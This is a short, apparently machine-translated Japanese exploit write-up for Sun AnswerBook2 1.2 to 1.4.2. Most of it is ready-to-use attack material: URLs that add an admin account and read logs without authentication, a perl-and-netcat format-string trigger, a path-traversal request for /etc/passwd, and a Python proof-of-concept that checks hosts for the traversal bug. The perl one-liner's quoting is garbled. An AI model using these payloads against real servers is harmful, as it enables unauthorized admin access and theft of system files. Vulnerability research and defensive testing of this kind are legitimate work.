搾取-Sun-AnswerBook



Exploitation Sun Answerbook



画像


QQ 1285575001
Wechat M010527
テクニカルエクスチェンジQQグループ599020441
私たちの年表




SunのAnswerBookには複数の脆弱性があります

1つ、Unauthorized management script access vulnerability

1.影響を受けるバージョン:



Sun-AnswerBook2 1.2-1.4.2

2.攻撃テスト方法

http://a.b.c.d:8888/ab2/@AdminViewError# access error log



http://a.b.c.d:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar#Add account (password)

2、Remote format string vulnerability

1.影響を受けるバージョン:

Sun-AnswerBook2 1.2-1.4.2

2.攻撃テスト方法:

perl -e 'print'GET /'print'%x'x20print' HTTP/1.0 '' | nc localhost 8888

次のエラーが表示されます。

http-8888 [23/Sep/2000:13:09:37 -0700] warning: send-file reports: The requested object '/usr/lib/ab2/data/docs/0fea19f580073656e642d66696c6520 7265706f7274733a2054686520726571756573746564206f626a65637420222f7573722f6 c69622f6162322f646174612f646f63732f' could not be opened!

3、Arbitrary file reading(一部のHTTPプロキシにもこの脆弱性があります):

脆弱なホストの対応するポートに直接接続します()

ペイロードを送信する
GET /../../../../../../../../../etc/passwd HTTP/1.1

対応するファイルの内容を取得できます
画像

XunfengのPOCを参照してください。

def check(ip, port, timeout): try: socket.setdefaulttimeout(timeout) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, int(port))) flag = 'GET /../../../../../../../../../etc/passwd HTTP/1.1 ' s.send(flag) data = s.recv(1024) s.close() if 'root:' in data and 'nobody:' in data: return u'Vulnerability' except: pass